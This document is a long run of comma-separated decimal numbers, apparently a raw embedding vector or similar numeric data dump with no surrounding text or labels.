-0.019161894917488098, -0.017882518470287323, 0.007654695305973291, -0.000987383769825101, -0.022238146513700485, 0.010127197951078415, -0.004143598023802042, 0.03392503410577774, -0.012865637429058552, -0.0038237536791712046, 0.0035254722461104393, -0.012664387933909893, -0.005462505389004946, 0.030503779649734497, -0.0024203930515795946, -0.006199224852025509, 0.020038770511746407, 0.00006508063233923167, -0.014720014296472073, -0.00020461934036575258, -0.008301571011543274, 0.03763378784060478, -0.021332520991563797, 0.009494696743786335, 0.025846276432275772, 0.009271884337067604, 0.03438503295183182, -0.006292662583291531, 0.011320323683321476, -0.007007819600403309, 0.0024617211893200874, -0.03662753477692604, -0.005095942411571741, -0.0030852374620735645, -0.007316882256418467, -0.010400323197245598, 0.01960751973092556, 0.00983250979334116, -0.005652974359691143, -0.00021562521578744054, -0.009106571786105633, 0.01246313750743866, 0.0011787511175498366, -0.024566899985074997, -0.030705031007528305, 0.015237514860928059, 0.0396750383079052, -0.026349401101469994, 0.000302998349070549, -0.018773768097162247, -0.014209701679646969, 0.019952518865466118, 0.01755189150571823, 0.031050030142068863, -0.03294753283262253, -0.01952126994729042, -0.007568445056676865, -0.010500947944819927, -0.0040142228826880455, 0.031050030142068863, -0.02765752747654915, -0.01831376738846302, 0.01566876471042633, -0.009710322134196758, 0.029095029458403587, 0.0055631306022405624, 0.000748848426155746, 0.007554070092737675, -0.038697537034749985, -0.026823775842785835, 0.002093361457809806, -0.01009844709187746, -0.025731274858117104, 0.006465162616223097, 0.025702524930238724, -0.009214384481310844, -0.0142887644469738, 0.007291725836694241, -0.00034252964542247355, 0.006914381869137287, -0.008761570788919926, 0.006436412688344717, 0.005419380497187376, -0.042320042848587036, 0.038381289690732956, 0.006943131797015667, 0.015568140894174576, -0.014906889759004116, 0.014633764512836933, 0.019506894052028656, -0.023474399000406265, -0.01778189279139042, 0.014576264657080173, 0.017537517473101616, -0.00807157065719366, -0.016272516921162605, 0.016330016776919365, -0.025975650176405907, -0.010235009714961052, -0.036167535930871964, -0.008941259235143661, 0.010242197662591934, 0.007439069915562868, -0.000903829000890255, 0.0036243004724383354, 0.022238146513700485, 0.012606887146830559, -0.009602509438991547, 0.02622002549469471, 0.002105939667671919, -0.02371877431869507, 0.027858776971697807, -0.009588134475052357, -0.004298129118978977, 0.007683445233851671, -0.02070002071559429, -0.010306885465979576, 0.03521878644824028, -0.029555030167102814, 0.003845316357910633, 0.007712195161730051, -0.008855008520185947, 0.0253431499004364, -0.013066887855529785, -0.018126893788576126, -0.021145645529031754, 0.036167535930871964, -0.011859387159347534, 0.022885022684931755, -0.006091412156820297, 0.020671270787715912, 0.0742325708270073, -0.005667349323630333, -0.021677521988749504, -0.016833141446113586, -0.03130878135561943, -0.019262518733739853, 0.021505020558834076, -0.006914381869137287, 0.011097511276602745, -0.007827195338904858, 0.006504693999886513, 0.00756125757470727, 0.0022155491169542074, 0.02034064568579197, -0.0006944928900338709, 0.0009370712214149535, -0.008840633556246758, 0.025831900537014008, 0.016387516632676125, -0.013577201403677464, 0.01349095068871975, 0.0000010879526826101937, 0.00022584495309274644, -0.007539695128798485, 0.024150023236870766, -0.019851895049214363, 0.001544415601529181, -0.047725047916173935, -0.029066279530525208, -0.008718445897102356, -0.005462505389004946, -0.00909938383847475, -0.01901814341545105, -0.017595017328858376, 0.005803911946713924, 0.007194694597274065, -0.00588656822219491, 0.0023988306056708097, -0.009041883982717991, -0.011794699355959892, -0.006328599993139505, -0.015783766284585, -0.016157515347003937, -0.012499074451625347, 0.014576264657080173, 0.030360030010342598, 0.031855031847953796, 0.005613442976027727, -0.021893147379159927, 0.011586261913180351, 0.010213447734713554, -0.026406900957226753, 0.037145037204027176, -0.011924074031412601, 0.004517348017543554, -0.006691568996757269, -0.012225949205458164, -0.0030852374620735645, -0.027413152158260345, 0.009135321713984013, 0.00047212938079610467, 0.012973450124263763, -0.02075752057135105, -0.003741097403690219, -0.02174939587712288, -0.015769390389323235, -0.02304314821958542, -0.0008328523836098611, -0.02542939968407154, -0.004700629506260157, 0.01264282502233982, -0.006472350098192692, -0.004312504082918167, 0.007992507889866829, 0.014849389903247356, 0.021260645240545273, 0.0009604306542314589, 0.011485636234283447, -0.012693137861788273, -0.012017511762678623, 0.00540859904140234, -0.007812820374965668, -0.006005162373185158, 0.03289003297686577, -0.015582515858113766, 0.019406268373131752, -0.01707751676440239, -0.010256572626531124, 0.014504389837384224, 0.030906280502676964, 0.0013045325176790357, 0.030647531151771545, 0.007176725659519434, 0.014101888984441757, 0.014188138768076897, 0.029756279662251472, 0.01620064117014408, -0.016833141446113586, -0.038438789546489716, -0.020470019429922104, -0.00980375986546278, -0.0021957834251224995, 0.0015165640506893396, 0.0013782044406980276, 0.0011850402224808931, 0.014173763804137707, -0.004492192063480616, 0.022008147090673447, 0.021821271628141403, -0.013167512603104115, -0.034873783588409424, -0.04088253900408745, -0.007431882433593273, -0.005060005001723766, -0.01569751463830471, 0.03441378474235535, 0.004377191886305809, 0.005581099074333906, -0.014324701391160488, -0.02304314821958542, -0.010155947878956795, -0.001919064437970519, 0.020714394748210907, 0.012959075160324574, -0.011622198857367039, -0.00019001972395926714, -0.013253763318061829, -0.015740640461444855, 0.027858776971697807, 0.023388147354125977, 0.00089664151892066, 0.015711890533566475, 0.01347657572478056, -0.004104066640138626, 0.019176268950104713, -0.021979397162795067, 0.016703765839338303, 0.03941629081964493, -0.025673775002360344, 0.022741273045539856, -0.002391642890870571, 0.039962541311979294, 0.0005857818177901208, 0.00676703779026866, 0.0005803912063129246, -0.0023880491498857737, 0.015970641747117043, 0.029382528737187386, -0.0031571125146001577, 0.0323437824845314, 0.014849389903247356, -0.012067824602127075, 0.023862523958086967, 0.0230718981474638, 0.01253501232713461, -0.0035614098887890577, 0.00973188504576683, 0.005926099605858326, 0.03312003239989281, 0.03789253905415535, 0.00814344547688961, 0.02340252324938774, 0.008646571077406406, -0.011140636168420315, -0.0019316425314173102, 0.04140004143118858, -0.006328599993139505, -0.046402547508478165, -0.03542003408074379, -0.026507526636123657, 0.015323765575885773, 0.019003769382834435, 0.00002018678787862882, 0.014518764801323414, 0.005696099251508713, 0.015223139896988869, 0.0038848475087434053, 0.0063321939669549465, 0.017436891794204712, 0.006997038144618273, 0.0023161740973591805, 0.0032182063441723585, 0.02560190111398697, 0.009315009228885174, 0.01053688582032919, 0.0015093764523044229, 0.017954392358660698, 0.005570318084210157, -0.03769128769636154, 0.02304314821958542, 0.011931261979043484, 0.03432753309607506, -0.007007819600403309, -0.013102825731039047, 0.0011167589109390974, 0.0078918831422925, -0.00623156875371933, -0.013246575370430946, -0.003917191177606583, 0.025558775290846825, 0.018069392070174217, -0.014720014296472073, 0.008337507955729961, 0.010270947590470314, 0.000795567175373435, -0.007104850839823484, -0.0008440828532911837, 0.008524383418262005, 0.0009253915632143617, -0.023704398423433304, 0.001495001488365233, 0.03421253338456154, -0.014518764801323414, -0.007503757253289223, -0.0017384783132001758, -0.014978764578700066, -0.010191884823143482, -0.022597521543502808, 0.008797508664429188, 0.009149696677923203, -0.028088778257369995, 0.025443775579333305, 0.0028408621437847614, -0.0007129108416847885, -0.0181987676769495, 0.019219394773244858, 0.022770022973418236, -0.0214331466704607, 0.016761265695095062, -0.001514767180196941, -0.0063357874751091, 0.013260950334370136, 0.0000410754801123403, 0.02399189956486225, -0.012455949559807777, -0.02402064949274063, 0.0065478188917040825, 0.0018471893854439259, -0.013742513954639435, 0.003396097104996443, 0.0027330496814101934, 0.0019639863166958094, -0.024293774738907814, -0.0066053192131221294, 0.005340317729860544, -0.00027896513347513974, 0.00019585956761147827, -0.01949252001941204, -0.012218762189149857, 0.015223139896988869, 0.0014905092539265752, -0.00006423834565794095, -0.01055126078426838, -0.01949252001941204, 0.0008961922721937299, 0.021001895889639854, 0.02011064440011978, 0.030417529866099358, -0.007554070092737675, 0.008811883628368378, 0.006763444282114506, -0.004237035289406776, 0.022827522829174995, 0.012039074674248695, -0.00669516297057271, 0.032171282917261124, -0.00879032164812088, -0.0018705487018451095, -0.001381798298098147, 0.016243766993284225, -0.0009721103124320507, 0.006177662406116724, 0.0012578137684613466, 0.0010350010124966502, 0.004743754863739014, -0.005095942411571741, -0.015280639752745628, -0.00987563468515873, 0.012031886726617813, 0.0036835973151028156, -0.02269814722239971, 0.04565504565834999, -0.0026234399992972612, -0.02272689715027809, 0.007266569882631302, -0.03907128795981407, -0.027772527188062668, 0.002017892664298415, 0.001773517346009612, -0.02166314609348774, 0.0047473483718931675, 0.005088754929602146, -0.035707537084817886, -0.004053753800690174, 0.01264282502233982, 0.0023215648252516985, -0.0010601573158055544, 0.001009844709187746, -0.0036907847970724106, -0.015323765575885773, 0.012915950268507004, -0.003453597193583846, 0.017063142731785774, 0.010364385321736336, -0.038496289402246475, 0.01244876254349947, -0.006731100380420685, -0.0019783612806349993, 0.01152157410979271, -0.010939385741949081, 0.00576797453686595, -0.01884564384818077, -0.015395640395581722, -0.004150785505771637, -0.022583147510886192, -0.016689391806721687, 0.012125324457883835, -0.006026724819093943, -0.002610862022265792, 0.006407662760466337, -0.008840633556246758, -0.013045325875282288, -0.005897349677979946, 6.106573664510506e-7, 0.014655327424407005, 0.01752314157783985, -0.011852199211716652, -0.005911724641919136, 0.005372661631554365, -0.018975019454956055, 0.01817001774907112, 0.0037159412167966366, 0.008768758736550808, -0.011485636234283447, 0.014835014939308167, 0.0028875810094177723, 0.02686690166592598, -0.01507939025759697, -0.018946269527077675, -0.010335635393857956, -0.046345047652721405, -0.0070401630364358425, -0.01167251169681549, 0.010263760574162006, 0.007011413108557463, 0.010644698515534401, 0.032142531126737595, 0.003349378239363432, 0.011126261204481125, -0.03950253874063492, -0.02166314609348774, -0.009983447380363941, 0.008962821215391159, 0.020053144544363022, 0.01910439319908619, -0.009631259366869926, -0.01249188743531704, -0.012628450058400631, 0.013095637783408165, -0.020240020006895065, -0.009487509727478027, -0.001487814006395638, -0.01339032594114542, -0.000780742964707315, 0.008718445897102356, -0.010170322842895985, -0.002923518419265747, 0.004851567093282938, -0.0019496113527566195, -0.022123146802186966, -0.00021989279775880277, 0.01505064032971859, 0.018543768674135208, -0.005250473972409964, -0.017350642010569572, -0.0027995340060442686, 0.026737526059150696, -0.031970031559467316, 0.007999695837497711, 0.008179383352398872, -0.01505064032971859, -0.005775162018835545, -0.011406573466956615, 0.0049809422343969345, -0.002353908494114876, 0.004237035289406776, -0.013483763672411442, 0.0042729731649160385, -0.032085031270980835, -0.0007551374728791416, 0.009652822278439999, -0.011528761126101017, 0.01910439319908619, 0.009365322068333626, 0.017034392803907394, -0.008078757673501968, 0.0003110842953901738, 0.012513450346887112, -0.04424629360437393, -0.002982815494760871, 0.02801690250635147, -0.0003982328053098172, 0.00914250873029232, 0.016056891530752182, -0.003805784974247217, 0.011485636234283447, 0.004111254122108221, -0.024825649335980415, 0.003367347177118063, -0.01274344976991415, 0.007453444879502058, -0.003906410187482834, 0.03800753876566887, -0.026004400104284286, -0.04234879091382027, -0.001820236211642623, -0.005897349677979946, 0.0014348061522468925, 0.012664387933909893, -0.011083136312663555, 0.01628689095377922, 0.0027564088813960552, -0.011456886306405067, -0.018299393355846405, 0.0044526606798172, -0.019995644688606262, 0.02416439913213253, 0.0040070354007184505, -0.023905647918581963, -0.02627752535045147, 0.005609849467873573, 0.007288132328540087, 0.020182520151138306, -0.012937513180077076, 0.02104502171278, 0.005882974714040756, -0.0036943787708878517, -0.005850630812346935, 0.002479689894244075, 0.002206564648076892, -0.0027725808322429657, 0.005617036949843168, -0.005732037127017975, 0.009660009294748306, -0.009530634619295597, -0.02795940265059471, -0.0047221919521689415, -0.0023736741859465837, -0.019923768937587738, -0.013706576079130173, -0.01147844921797514, 0.005214536562561989, 0.016948141157627106, 0.007791257929056883, -0.005286411382257938, -0.010019385255873203, 0.00397469149902463, 0.009516259655356407, -0.01265719998627901, -0.005897349677979946, -0.0036746130790561438, -0.026852525770664215, 0.02310064807534218, 0.01177313644438982, 0.010781261138617992, 0.019406268373131752, 0.0022478927858173847, 0.004682661034166813, 0.001586642232723534, 0.0033529719803482294, 0.02407814934849739, -0.0065406314097344875, -0.015596890822052956, 0.00811469554901123, 0.014080326072871685, -0.018184393644332886, -0.00973188504576683, 0.009976259432733059, -0.009164071641862392, -0.007568445056676865, -0.00458562932908535, 0.017307518050074577, -0.01845751889050007, 0.01183063630014658, 0.0021957834251224995, 0.04068129137158394, -0.012333761900663376, 0.0049809422343969345, -0.007755320053547621, 0.010026572272181511, 0.002231721067801118, 0.008775945752859116, 0.0007690632482990623, 0.0004247367614880204, 0.03760503605008125, -0.011981574818491936, -0.009537821635603905, 0.033378783613443375, 0.00006861823203507811, 0.00017036637291312218, 0.012513450346887112, 0.00397469149902463, 0.015208764933049679, 0.005225317552685738, -0.00705453846603632, -0.0010547667043283582, -0.028031278401613235, -0.014080326072871685, 0.010199072770774364, -0.017925642430782318, 0.0032379720360040665, 0.013354388065636158, -0.008301571011543274, 0.014662514440715313, 0.01339032594114542, 0.007848757319152355, -0.015438765287399292, 0.0009469540673308074, -0.011140636168420315, 0.012542200274765491, 0.013411887921392918, 0.0020394551102072, 0.0012128917733207345, -0.019190644845366478, -0.0011284386273473501, -0.002046642592176795, 0.008315945975482464, 0.014497201889753342, -0.017451267689466476, -0.01250626239925623, 0.007827195338904858, -0.014547514729201794, -0.008165008388459682, 0.0015722671523690224, -0.002073595765978098, -0.0017133220098912716, 0.02340252324938774, -0.004880317486822605, 0.015496265143156052, -0.013167512603104115, 0.004578441847115755, -0.011485636234283447, 0.004154379013925791, 0.020886896178126335, -0.0073240697383880615, 0.013692201115190983, -0.002312580356374383, -0.017595017328858376, -0.0078918831422925, -0.0023754711728543043, -0.00894844625145197, 0.0068640694953501225, -0.009041883982717991, -0.0091712586581707, -0.0037842225283384323, -0.011931261979043484, -0.018975019454956055, 0.0016737907426431775, -0.01722126640379429, 0.0078918831422925, -0.007108444347977638, 0.0025605494156479836, 0.007183913141489029, 0.010328447446227074, 0.011176574043929577, 0.018069392070174217, -0.0035057065542787313, 0.02545814961194992, 0.0009397665853612125, -0.02337377332150936, 0.03018753044307232, -0.013304075226187706, -0.009501884691417217, -0.005577505566179752, -0.0035506284330040216, 0.004140004049986601, 0.0031768782064318657, -0.007453444879502058, 0.019564393907785416, -0.008610633201897144, 0.019320018589496613, 0.00334039400331676, 0.006425631232559681, 0.004801254719495773, 0.006414850242435932, -0.037346288561820984, 0.018026268109679222, -0.03300503268837929, 0.005113911349326372, -0.01972251944243908, 0.016531266272068024, 0.007805632892996073, 0.000588477123528719, 0.02869252860546112, -0.0072989133186638355, -0.012527825310826302, -0.012204387225210667, 0.0035254722461104393, 0.007927820086479187, 0.008366257883608341, -0.009911572560667992, 0.006375318858772516, 0.0004510160651989281, -0.003202034393325448, -0.014648139476776123, -0.0003919437585864216, 0.01907564327120781, -0.020771896466612816, -0.006177662406116724, -0.023646898567676544, -0.013627513311803341, -0.01183063630014658, -0.010472198016941547, -0.0044814106076955795, 0.0005300786579027772, -0.013210638426244259, 0.014806265011429787, -0.0033314095344394445, -0.0019783612806349993, -0.020915646106004715, 0.012944700196385384, -0.0038776600267738104, -0.016761265695095062, 0.015611265785992146, -0.004096879158169031, 0.013649076223373413, 0.017968768253922462, -0.02022564597427845, 0.004582035820931196, -0.018443142995238304, 0.014497201889753342, -0.00352726923301816, 0.0032200030982494354, 0.01716376654803753, 0.0016324626049026847, 0.02604752592742443, -0.013059700839221478, -0.0009783994173631072, 0.021950647234916687, -0.00377344130538404, -0.008035632781684399, -0.012815325520932674, -0.014525951817631721, -0.008747195824980736, 0.001079024514183402, 0.004398754332214594, 0.024380024522542953, 0.015985015779733658, 0.0045389109291136265, -0.002206564648076892, 0.023474399000406265, 0.010623135603964329, -0.016646265983581543, 0.018055018037557602, 0.011485636234283447, -0.011938448995351791, 0.024825649335980415, -0.0013557435013353825, -0.009703134186565876, 0.012470324523746967, 0.01337595097720623, 0.012815325520932674, 0.004463442135602236, 0.008395008742809296, 0.00293609662912786, -0.007255788426846266, -0.018385643139481544, 0.015582515858113766, 0.004485004581511021, 0.00268992455676198, 0.008280008099973202, -0.009753447026014328, -0.00976063497364521, 0.005358286667615175, -0.0038704725448042154, -0.019003769382834435, 0.0019388300133869052, -0.00786313321441412, -0.005710474215447903, -0.002556955674663186, 0.006220787297934294, 0.0025946900714188814, -0.021648772060871124, -0.01144969929009676, -0.018673144280910492, -0.012894387356936932, -0.01727876625955105, 0.0010529698338359594, 0.0002749221457634121, 0.00635016243904829, 0.008006882853806019, -0.004801254719495773, 0.03625378757715225, -0.005861412268131971, 0.006008755881339312, -0.04096879065036774, -0.0007187506998889148, 0.010235009714961052, -0.004962973762303591, 0.008984384126961231, -0.013886263594031334, -0.0019298456609249115, -0.0002594240941107273, -0.0034769566264003515, 0.00035802769707515836, 0.00007412116974592209, 0.0007865828229114413, 0.005609849467873573, -0.000429902778705582, -0.005638599395751953, 0.004718598444014788, 0.00028435574495233595, 0.008610633201897144, -0.009940322488546371, -0.0065801627933979034, -0.007431882433593273, -0.003361956449225545, -0.017451267689466476, 0.030877530574798584, -0.006490319035947323, -0.0010835167486220598, 0.012319386936724186, 0.006946725770831108, -0.0023233615793287754, -0.010975323617458344, 0.002857034094631672, -0.01441813912242651, -0.0063070375472307205, -0.008308758027851582, -0.007554070092737675, 0.000529629411175847, -0.011140636168420315, 0.016746891662478447, 0.011600636877119541, -0.000023822654839023016, 0.0031714874785393476, 0.010184697806835175, -0.020498771220445633, -0.017882518470287323, 0.00360094103962183, 0.029440028592944145, -0.011413761414587498, 0.0020843769889324903, -0.002955862320959568, -0.012297824956476688, -0.0019981269724667072, -0.008955634199082851, 0.01881689392030239, -0.009430008940398693, 0.008883758448064327, 0.000561524007935077, 0.013512513600289822, -0.013893451541662216, -0.0044814106076955795, 0.011859387159347534, -0.005444536451250315, -0.02093002013862133, -0.005153442732989788, 0.007654695305973291, -0.00915688369423151, -0.0047976612113416195, 0.013282513245940208, 0.012513450346887112, 0.021979397162795067, 0.014748764224350452, -0.00159113435074687, 0.0008018562803044915, -0.01763814315199852, -0.020355019718408585, -0.0017555486410856247, -0.009027509018778801, 0.008423758670687675, 0.017451267689466476, -0.008265633136034012, -0.00006788824975956231, -0.017293142154812813, 0.004485004581511021, -0.010076885111629963, -0.017983142286539078, 0.00545172393321991, 0.015625640749931335, -0.007690632715821266, -0.019348768517374992, 0.007302507292479277, 0.0026270337402820587, -0.012951888144016266, -0.014547514729201794, 0.00312297185882926, 0.017710017040371895, -0.0032918781507760286, -0.0032793001737445593, 0.010364385321736336, -0.01943502016365528, 0.009487509727478027, -0.00879032164812088, -0.00753250764682889, -0.001312618493102491, 0.013181888498365879, -0.002170627238228917, -0.022238146513700485, -0.011032823473215103, -0.017307518050074577, 0.006935944315046072, -0.0005857818177901208, 0.009911572560667992, 0.0022568772546947002, 0.0164593905210495, -0.002359299222007394, 0.02177814580500126, -0.007367194630205631, -0.01772439293563366, 0.003852503839880228, -0.020038770511746407, 0.009976259432733059, -0.004427504260092974, 0.01446126401424408, -0.029138153418898582, -0.005642192903906107, 0.028965653851628304, 0.0036243004724383354, 0.006493912544101477, -0.005099536385387182, -0.0010996885830536485, -0.00811469554901123, 0.004729379899799824, -0.014820639975368977, 0.011212510988116264, -0.01637314073741436, 0.0078918831422925, -0.015223139896988869, -0.01070219837129116, 0.015467515215277672, -0.0017555486410856247, -0.00705453846603632, 0.0009721103124320507, -0.02078627049922943, -0.00443828571587801, 0.003467972157523036, -0.007018600590527058, 0.020412519574165344, -0.021677521988749504, 0.002914534183219075, 0.024566899985074997, -0.008315945975482464, -0.009207196533679962, 0.003622503485530615, 0.006670006550848484, -0.0066053192131221294, 0.004132816568017006, -0.01073094829916954, -0.019377518445253372, 0.002603674540296197, 0.007360007148236036, -0.00786313321441412, -0.002425783546641469, 0.0036782068200409412, -0.0021544552873820066, -0.006443600170314312, -0.01270032487809658, -0.014950014650821686, -0.0017223063623532653, 0.0035578159149736166, -0.00905625894665718, -0.014569076709449291, 0.00221195537596941, -0.004370004404336214, -0.023359397426247597, 0.017293142154812813, -0.0266944020986557, 0.004668286070227623, -0.022496897727251053, -0.013275325298309326, 0.010134384967386723, 0.007403132505714893, 0.007198288571089506, -0.013268138282001019, -0.003920785151422024, -0.004786879755556583, -0.03654128685593605, 0.004632348194718361, 0.00624594371765852, 0.000387900770874694, -0.021735021844506264, -0.0016486344393342733, 0.007126413285732269, -0.010270947590470314, 0.005660161841660738, 0.012297824956476688, 0.005325942765921354, -0.005652974359691143, -0.01367063820362091, -0.0031517217867076397, 0.004614379722625017, 0.029253153130412102, 0.016056891530752182, -0.0019909394904971123, 0.005383442621678114, -0.010615947656333447, -0.005918912123888731, 0.00045932663488201797, -0.004524535965174437, -0.0037985974922776222, 0.01637314073741436, 0.031021280214190483, 0.0015219546621665359, 0.026766275987029076, -0.011981574818491936, -0.0100409472361207, -0.006562193855643272, 0.023503148928284645, 0.013016575016081333, 0.010680635459721088, -0.0025120337959378958, 0.012017511762678623, 0.0017250017262995243, -0.001719611114822328, -0.0020825802348554134, -0.00527563039213419, -0.02242502197623253, 0.005573911592364311, 0.010342822410166264, -0.026320651173591614, 0.00406453525647521, -0.0015354312490671873, -0.0009891806403174996, -0.012844075448811054, -0.0003598245675675571, 0.0030870342161506414, -0.01250626239925623, -0.004927036352455616, -0.0018166424706578255, 0.004603598266839981, 0.003830941393971443, 0.027729403227567673, -0.012822512537240982, 0.006925163324922323, -0.01505064032971859, -0.018673144280910492, -0.015481890179216862, 0.016186265274882317, 0.03018753044307232, -0.022655023261904716, -0.019981270655989647, 0.007284538354724646, -0.00824407022446394, -0.01825626753270626, -0.0006958405137993395, 0.01884564384818077, 0.008941259235143661, -0.004197504371404648, -0.00029962920234538615, -0.0030007841996848583, -0.015438765287399292, 0.007417507469654083, -0.014669702388346195, -0.0035308629740029573, -0.01840001903474331, 0.00790625810623169, 0.019966894760727882, -0.020268769934773445, 0.0009478525025770068, -0.0047545358538627625, 0.013627513311803341, -0.003780628787353635, 0.009667197242379189, -0.02816065214574337, -0.023776274174451828, -0.0125493872910738, -0.013383137993514538, 0.004089691676199436, -0.0032954721245914698, -0.017264392226934433, 0.021145645529031754, -0.006256725173443556, 0.008689695969223976, 0.018328143283724785, 0.0005889263702556491, -0.002353908494114876, -0.025817526504397392, 0.000056910455896286294, -0.016028141602873802, 0.0029864092357456684, -0.008222508244216442, -0.00673828786239028, 0.002618049504235387, -0.02160564623773098, -0.005670943297445774, -0.014173763804137707, -0.0009604306542314589, 0.019449394196271896, 0.0038956289645284414, -0.013138762675225735, -0.014863764867186546, -0.0019046893576160073, 0.03139502927660942, -0.0033853158820420504, -0.0055128177627921104, 0.008330320939421654, 0.00891969632357359, -0.011090323328971863, -0.009753447026014328, -0.0014330092817544937, 0.0013036341406404972, -0.0035632066428661346, 0.01614314131438732, -0.012721887789666653, -0.022525647655129433, 0.02419314906001091, 0.008459695614874363, 0.0033457844983786345, 0.018802518025040627, 0.010881885886192322, -0.008660946041345596, 0.00817219540476799, 0.02475377544760704, -0.009365322068333626, -0.03251628205180168, 0.010249385610222816, -0.01725001633167267, 0.00807157065719366, 0.005778755526989698, 0.02436564862728119, -0.0008225203491747379, -0.021893147379159927, -0.012513450346887112, -0.002934299875050783, -0.0006787701859138906, -0.017925642430782318, 0.001302735647186637, -0.012053449638187885, 0.008898133412003517, 0.010033760219812393, 0.002830080920830369, 0.017853768542408943, 0.01572626642882824, -0.0030528935603797436, 0.0016243766294792295, 0.016861891373991966, -0.0029594560619443655, 0.01684751734137535, 0.015180015005171299, -0.0025084400549530983, -0.00887657143175602, 0.026061899960041046, 0.01237688772380352, 0.0070329755544662476, -0.022583147510886192, 0.015424390323460102, -0.0013135168701410294, -0.008545946329832077, -0.004405941814184189, 0.005142661277204752, -0.017623767256736755, -0.0035829723346978426, -0.019190644845366478, -0.0031571125146001577, 0.015194389969110489, -0.002005314454436302, -0.011607823893427849, 0.028376277536153793, -0.011097511276602745, -0.011420948430895805, -0.01637314073741436, -0.0004312504315748811, 0.021864397451281548, -0.008797508664429188, -0.011615011841058731, 0.015208764933049679, -0.00494500482454896, 0.013541263528168201, 0.008438133634626865, -0.0020340646151453257, -0.01566876471042633, -0.020211270079016685, 0.01430313941091299, 0.001043985364958644, 0.0003971097758039832, -0.005092348903417587, 0.00397469149902463, -0.019305644556879997, -0.008610633201897144, 0.0012075011618435383, -0.01622939109802246, -0.0012057042913511395, -0.0000026707484721555375, 0.01146407425403595, 0.005599068012088537, 0.0017420720541849732, 0.030647531151771545, 0.017738766968250275, -0.0030331281013786793, -0.014691264368593693, -0.0099187595769763, 0.0017717204755172133, -0.0010412901174277067, -0.019535643979907036, -0.0010430869879201055, -0.003250550013035536, 0.009573759511113167, -0.020412519574165344, -0.010601572692394257, 0.01684751734137535, 0.001866954960860312, 0.010371572338044643, -0.016545642167329788, 0.007395945023745298, 0.00887657143175602, 0.0022245333530008793, 0.007805632892996073, -0.004370004404336214, -0.0070473505184054375, 0.006648444104939699, 0.008150633424520493, 0.0018067596247419715, 0.002492268104106188, 0.013181888498365879, -0.025918150320649147, -0.02295689843595028, 0.015007514506578445, -0.024121273308992386, -0.015338140539824963, -0.02757127769291401, -0.00167019700165838, -0.002991799730807543, -0.0013629309833049774, -0.012024699710309505, 0.02016814425587654, 0.015683140605688095, 0.042435042560100555, -0.016732515767216682, -0.015280639752745628, -0.015366890467703342, -0.012369699776172638, 0.02501252479851246, 0.02433689869940281, -0.011737199500203133, 0.025673775002360344, -0.004855161067098379, -0.006396881304681301, -0.015438765287399292, 0.009473134763538837, -0.002955862320959568, -0.010896260850131512, -0.0035955505445599556, -0.0033996908459812403, -0.032056283205747604, -0.009329384192824364, -0.016631891950964928, -0.014691264368593693, -0.0005323247751221061, -0.020038770511746407, -0.012276262044906616, 0.005214536562561989, 0.001558790565468371, 0.0023000023793429136, 0.024480648338794708, -0.011586261913180351, 0.017997518181800842, 0.031941283494234085, -0.011543136090040207, 0.006242349743843079, 0.005236099008470774, -0.012297824956476688, 0.0011437120847404003, 0.00572484964504838, -0.023833774030208588, 0.003845316357910633, 0.01707751676440239, -0.007697820197790861, -0.00001370820427837316, -0.013066887855529785, 0.02208002097904682, -0.014367826282978058, 0.007288132328540087, 0.021864397451281548, 0.002871409058570862, 0.0013045325176790357, -0.003845316357910633, -0.016531266272068024, 0.007705007679760456, 0.007812820374965668, -0.020441269502043724, 0.01270032487809658, -0.011068761348724365, 0.009473134763538837, -0.008438133634626865, -0.0014545717276632786, 0.010213447734713554, 0.002298205392435193, 0.018658768385648727, -0.0028318779077380896, 0.000876875885296613, 0.004535316955298185, 0.012003136798739433, 0.018687518313527107, 0.0013934778980910778, -0.0030313311144709587, -0.011737199500203133, 0.021174395456910133, -0.007784070447087288, -0.0006333990604616702, -0.015223139896988869, -0.0024437524843961, -0.02298564836382866, -0.026507526636123657, -0.008136258460581303, -0.006619694177061319, 0.0042298478074371815, 0.009185634553432465, 0.0014518764801323414, -0.00015632828581146896, -0.006932350806891918, -0.008459695614874363, 0.013821575790643692, -0.0026216432452201843, 0.018975019454956055, 0.008538758382201195, 0.019621893763542175, 0.009250321425497532, 0.008438133634626865, -0.012384074740111828, -0.007697820197790861, 0.004894692450761795, -0.00542297400534153, 0.013232200406491756, 0.01972251944243908, -0.0048048486933112144, 0.004937817342579365, -0.005944068543612957, 0.02760002762079239, 0.0063142250292003155, -0.006012349855154753, 0.004822817165404558, 0.0028264871798455715, 0.000866993039380759, -0.02149064652621746, 0.02768627740442753, 0.004211879335343838, 0.007374382112175226, -0.003627894213423133, 0.023531898856163025, -0.011945636942982674, 0.009437196888029575, -0.003573987865820527, 0.017968768253922462, 0.03754753619432449, 0.00812907051295042, -0.02093002013862133, 0.019061269238591194, 0.020915646106004715, 0.003250550013035536, -0.0049809422343969345, 0.006213599815964699, -0.025228150188922882, -0.003360159695148468, 0.0035039098002016544, -0.017911268398165703, 0.0078918831422925, -0.017853768542408943, 0.009825321845710278, -0.0026144557632505894, 0.003935160115361214, 0.005207349080592394, -0.03636878728866577, -0.009063446894288063, 0.00007934334280434996, -0.004671879578381777, -0.009573759511113167, -0.0008638484869152308, -0.010335635393857956, -0.007963757961988449, 0.007460632361471653, -0.00375906634144485, -0.010407510213553905, -0.011737199500203133, -0.006529850419610739, 0.010529697872698307, 0.00409328518435359, 0.0036512536462396383, -0.005502036772668362, -0.0081578204408288, 0.02563065104186535, -0.008926884271204472, -0.04209004342556, -0.011219698935747147, -0.019190644845366478, -0.00990438461303711, 0.0050240675918757915, 0.00808594562113285, 0.014734389260411263, 0.009501884691417217, 0.02399189956486225, 0.003874066285789013, -0.0012515246635302901, -0.016358766704797745, -0.009005946107208729, 0.006810163147747517, -0.010594385676085949, -0.014921264722943306, -0.002283830428496003, 0.006159693468362093, 0.007956570014357567, -0.01699126698076725, -0.015582515858113766, -0.002093361457809806, -0.006802975665777922, -0.011327511630952358, 0.0012182825012132525, -0.012836887501180172, 0.006975475698709488, -0.0021095334086567163, -0.0007187506998889148, 0.0012003136798739433, -0.01246313750743866, 0.001401563873514533, -0.022913772612810135, -0.016948141157627106, -0.005228911526501179, 0.0005206450587138534, -0.02396314963698387, 0.008344695903360844, -0.007162350695580244, 0.007812820374965668, -0.03151003271341324, -0.011995949782431126, 0.03783503919839859, -0.01505064032971859, -0.03677128627896309, -0.0060482872650027275, -0.009027509018778801, 0.01412345189601183, -0.002625236986204982, 0.01268594991415739, -0.004362816922366619, -0.0004959380021318793, 0.008682508952915668, 0.0021113301627337933, -0.004510160535573959, -0.0136850131675601, 0.012606887146830559, -0.004664692096412182, -0.0020035177003592253, 